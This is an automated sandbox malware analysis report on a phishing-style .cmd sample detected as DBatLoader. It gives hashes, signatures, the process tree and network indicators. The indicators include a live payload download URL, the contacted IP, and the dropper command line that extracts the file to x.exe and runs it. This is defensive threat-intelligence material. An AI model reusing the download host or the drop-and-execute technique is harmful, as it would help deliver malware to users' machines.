Edit tour

Windows Analysis Report
PO#5_tower_Dec162024.cmd

Overview

General Information

Sample name:	PO#5_tower_Dec162024.cmd
Analysis ID:	1582694
MD5:	8ed519b7621506144f41033597388708
SHA1:	d1977995223392fb0d25a7c322d5da9e1157a568
SHA256:	b6f2833f88b702a8aba52760c0b55d799cda729a773172188abbf29a29da0f08
Tags:	cmduser-abuse_ch
Infos:

Detection

DBatLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

AI detected suspicious sample

Allocates many large memory junks

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 7564 cmdline: extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 6C1C692B2DE02C5CE02A5D2D27117851)

WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak2/228_Dlwloedmcwb"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
PO#5_tower_Dec162024.cmd	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\x.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.x.exe.2b80000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
4.0.x.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:44:13.766542+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: PO#5_tower_Dec162024.cmd

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/228_Dlwloedmcwb"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: PO#5_tower_Dec162024.cmd

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Source: unknown

HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49707 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B858B4

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak2/228_Dlwloedmcwb

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B9E2F8 InternetCheckConnectionA,

4_2_02B9E2F8

Source: Joe Sandbox View

IP Address: 198.252.105.91 198.252.105.91

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 198.252.105.91:443

Source: global traffic

HTTP traffic detected: GET /yak2/228_Dlwloedmcwb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /yak2/228_Dlwloedmcwb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com

Source: global traffic

DNS traffic detected: DNS query: gxe0.com

Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: x.exe, 00000004.00000002.1593176423.0000000000733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.1611343885.0000000020ACD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak2/228_Dlwloe
Source: x.exe, 00000004.00000002.1611343885.0000000020ADC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb
Source: x.exe, 00000004.00000002.1593176423.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb7z
Source: x.exe, 00000004.00000002.1593176423.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwb?
Source: x.exe, 00000004.00000002.1593176423.0000000000700000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak2/228_Dlwloedmcwbxell
Source: x.exe, 00000004.00000002.1593176423.000000000073D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com:443/yak2/228_Dlwloedmcwb

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49707 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02B9DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B97D00 NtWriteVirtualMemory,	4_2_02B97D00
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,	4_2_02B9DACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	4_2_02B9DA44
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B98BB0 GetThreadContext,SetThreadContext,NtResumeThread,	4_2_02B98BB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B98BAE GetThreadContext,SetThreadContext,NtResumeThread,	4_2_02B98BAE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,	4_2_02B9D9F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B9EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

4_2_02B9EC74

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B820C4

4_2_02B820C4

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B846A4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B844D0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B98824 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B987A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B844AC appears 73 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B8480C appears 931 times

Source: C:\Users\user\AppData\Local\Temp\x.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168

Source: classification engine

Classification label: mal88.troj.evad.winCMD@7/6@2/1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B87F5A GetDiskFreeSpaceA,

4_2_02B87F5A

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B96D50 CoCreateInstance,

4_2_02B96D50

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB07564.TMP

Jump to behavior

Source: Yara match	File source: PO#5_tower_Dec162024.cmd, type: SAMPLE
Source: Yara match	File source: 4.0.x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1592457768.000000007F700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1411291204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO#5_tower_Dec162024.cmd

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2168
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_tower_Dec162024.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.2b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1593974341.00000000022C7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1414129618.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1413414951.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B987A0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B832FC push eax; ret	4_2_02B83338
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02BAC2FC push 02BAC367h; ret	4_2_02BAC35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8635A push 02B863B7h; ret	4_2_02B863AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8635C push 02B863B7h; ret	4_2_02B863AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02BAC0AC push 02BAC125h; ret	4_2_02BAC11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02BAC1F8 push 02BAC288h; ret	4_2_02BAC280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02BAC144 push 02BAC1ECh; ret	4_2_02BAC1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B986C0 push 02B98702h; ret	4_2_02B986FA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8673E push 02B86782h; ret	4_2_02B8677A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B86740 push 02B86782h; ret	4_2_02B8677A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8C4F4 push ecx; mov dword ptr [esp], edx	4_2_02B8C4F9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9E5B4 push ecx; mov dword ptr [esp], edx	4_2_02B9E5B9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8D528 push 02B8D554h; ret	4_2_02B8D54C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8CB74 push 02B8CCFAh; ret	4_2_02B8CCF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02BABB6C push 02BABD94h; ret	4_2_02BABD8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B8CB56 push 02B8CCFAh; ret	4_2_02B8CCF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B97894 push 02B97911h; ret	4_2_02B97909
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B968D0 push 02B9697Bh; ret	4_2_02B96973
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B968CE push 02B9697Bh; ret	4_2_02B96973
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9A920 push 02B9A958h; ret	4_2_02B9A950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B98918 push 02B98950h; ret	4_2_02B98948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B9A91F push 02B9A958h; ret	4_2_02B9A950
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B98916 push 02B98950h; ret	4_2_02B98948
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B92EE8 push 02B92F5Eh; ret	4_2_02B92F56
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B95E04 push ecx; mov dword ptr [esp], edx	4_2_02B95E06
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B92FF3 push 02B93041h; ret	4_2_02B93039
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B92FF4 push 02B93041h; ret	4_2_02B93039

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B9A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02B9A95C

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
